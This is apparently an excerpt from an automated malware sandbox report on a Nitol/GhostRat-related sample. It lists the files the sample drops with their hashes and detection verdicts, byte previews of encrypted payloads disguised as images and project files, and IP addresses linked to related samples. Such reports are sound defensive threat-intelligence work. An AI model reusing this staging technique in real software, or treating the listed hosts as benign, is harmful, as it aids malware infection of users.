                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 59.110.190.44
                                                                  • 118.178.60.9
                                                                  e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                  • 59.110.190.44
                                                                  • 118.178.60.9
                                                                  e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                                                                  • 59.110.190.44
                                                                  • 118.178.60.9

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Program Files (x86)\2dHqG0\2dHqG0.exee2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                    23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                      287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                        2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                          2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                                                                            2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                                                              45631.exeGet hashmaliciousNitolBrowse
                                                                                0000000000000000.exeGet hashmaliciousNitolBrowse
                                                                                  T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                    setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Program Files (x86)\2dHqG0\2dHqG0.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):54152
                                                                                      Entropy (8bit):6.64786972992462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                      MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                      SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                      SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                                                                      • Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse
                                                                                      • Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
                                                                                      • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                                      • Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse
                                                                                      • Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse
                                                                                      • Filename: 45631.exe, Detection: malicious, Browse
                                                                                      • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                                                      • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                                                      • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\2dHqG0\log.src

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):5059989
                                                                                      Entropy (8bit):7.999955227933758
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:YOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:/o6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                      MD5:7BDAA883D4B5D4114B92347A7FE27EB0
                                                                                      SHA1:40353EDB69013D055078DD2F1EA0AF8C280F18CC
                                                                                      SHA-256:C206DA14428BF3FFB0D667C33F1BC14321E1FC619DFFFB06B78BD825EBDC5DB5
                                                                                      SHA-512:008A7B63CAA4699AEBA9810104B0A91AC46AEA17B2DCCE6393D102CA3C222B9463B00A3358B4D6102A43808458420D7D138B9999A30FD5825E4BE21DE5E2059C
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                      C:\Program Files (x86)\2dHqG0\tbcore3U.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4858192
                                                                                      Entropy (8bit):7.992517256385813
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/u:9S4+O6P5OeMRrjRy7aPZbm3k8V/u
                                                                                      MD5:D27D50E9FCA875691B8C0208A7178AC7
                                                                                      SHA1:60F12D549CC49F18926AF29C94ECDD4A70117132
                                                                                      SHA-256:B2FD77E385D3C48FBCDBD53087BE2E04285E3EFC6B08825136661FFDC7244B32
                                                                                      SHA-512:AA238F451965FF714B2705C449F4A081F0631A89D15FB6204CE340DC72711794DC00B2998BA8D9AFF75BE56084359ECCB600E5F4A476E433A931F643C83B3EE9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\2dHqG0\utils.vcxproj

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):365477
                                                                                      Entropy (8bit):7.99939895338394
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:liACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:M8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                      MD5:F05F10FD2E800BF789B9438837F36A7A
                                                                                      SHA1:3FBBEDEFAD734676C11C976D77158B4722F9E901
                                                                                      SHA-256:591F9754AF07D3226D96156674202AA998406D744937D1358D1CDE084885E515
                                                                                      SHA-512:99E109471DCB7A81BF2957B3961C9126A7C1DA1967D49EC7DB5CD4F0747CD9D74ADACC79CD066D50112A8CB8A0697298B541089B22808DB3A4A23E69131CDC45
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF47.243.243.58...."ijstuvwxyz....qsuula.net......3#..............243.58....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                      C:\Program Files (x86)\8srsV\log.src

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):5059989
                                                                                      Entropy (8bit):7.999955228844125
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:8OQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Lo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                                      MD5:BE35CE10D28A9081AE211FE45C74A4C8
                                                                                      SHA1:895D31F4F8BEFB4861D60EF113A2691F8E2CACF4
                                                                                      SHA-256:F89BBDBE7AEA592509C24D26486A16239A6F9E8EB7BF4B94A01AB9D0418A8991
                                                                                      SHA-512:7EC1C6188DCF53DAB6D03D485B9163630D371C27205EDA443E08BFBCFFD76783BAC274FB8548D74039004ACCFF1D10CB1F6F69DE8BC60B948290563010ABF3A0
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                      C:\Program Files (x86)\8srsV\pw8XjN.exe

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):54152
                                                                                      Entropy (8bit):6.64786972992462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                                      MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                                      SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                                      SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\8srsV\tbcore3U.dll

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4858192
                                                                                      Entropy (8bit):7.9925166462682515
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/P:9S4+O6P5OeMRrjRy7aPZbm3k8V/P
                                                                                      MD5:C3615E435E46478F3C4A90F919CE8E6C
                                                                                      SHA1:52E1345E5092833A307FB3B7C6A11166B2F11D6D
                                                                                      SHA-256:1B2D6D07AF2C0ABA874CEDA404B9996895D7DEBCFCFB9DCD8FD8739F517137BF
                                                                                      SHA-512:761D7E7342155D059B0A9947A65A0D9AE6B40423A355FC6E651A628FB668CF183F483051A6BC3B12320E06FC7158B47390C26EA22423D89B5731809B66A12FF9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\8srsV\utils.vcxproj

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):365477
                                                                                      Entropy (8bit):7.999398942475662
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:niACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:i8u69CghoQxoMTFQqtKFCG7mbZ
                                                                                      MD5:138A538E3557A931BF8E773B6F08066E
                                                                                      SHA1:136E939CAC49AAE1A0C2BF8D39AF12ED1B630EDC
                                                                                      SHA-256:7296BB4DA969E90026C9BD995BD791708E636F93F3C027B6A7F2C357CCC504AF
                                                                                      SHA-512:1951426C3C18F49AE2A9A453B0E64B4A3944126267172A5BF7116B01F8D9DA5A3AB6BA13204FC012569748D917BE1976668A32C18E39DD7998951DD9705D28F9
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF47.243.243.58...."ijstuvwxyz....qsuula.net......3#..............243.58....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                      C:\Users\Public\Music\destopbak.ini

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:MIPSEB MIPS-III ECOFF executable
                                                                                      Category:modified
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:s:s
                                                                                      MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                                                      SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                                                      SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                                                      SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:.@

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):366410
                                                                                      Entropy (8bit):7.375315637594966
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                                      MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                                      SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                                      SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                                      SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):3892010
                                                                                      Entropy (8bit):7.995495589600101
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                                                      MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                                                      SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                                                      SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                                                      SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):879
                                                                                      Entropy (8bit):4.5851931774575325
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                                      MD5:E54C4296F011EC91D935AA353C936E34
                                                                                      SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                                      SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                                      SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                                      Malicious:false
                                                                                      Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):512
                                                                                      Entropy (8bit):5.3013015844763345
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:WetLMBui9QCrztE+CrCa2BIDR6Ye89r7OdUzW9E40/qcX:2BuUQCrztEJMBIDRFgUzWg3
                                                                                      MD5:C3BE870A726F627202B33B6AAD385CC2
                                                                                      SHA1:CA594F5841AAEC1E2A765F4CE1FACA56DF0F3741
                                                                                      SHA-256:F3E55A5CDCA6DB81E9FE1B1321174D057F6967382ACF98162C0DFE877AA78269
                                                                                      SHA-512:926DFAA48EF276776143B35C188130E0FB69C6A68DB7737024AC009C3E4348C7976D464F48A11C7A7396A8CABD0EEA9420FF6AAA49657B1A790DB77E4BAF79DB
                                                                                      Malicious:false
                                                                                      Preview:....l%00Q.]Gv>i([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy.A..?w a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33R.^Du=j+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx.@..>v!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):4859125
                                                                                      Entropy (8bit):7.999956261017207
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                                      MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                                      SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                                      SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                                      SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):125333
                                                                                      Entropy (8bit):7.993522712936246
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                                                      MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                                                      SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                                                      SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                                                      SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                                                      Malicious:false
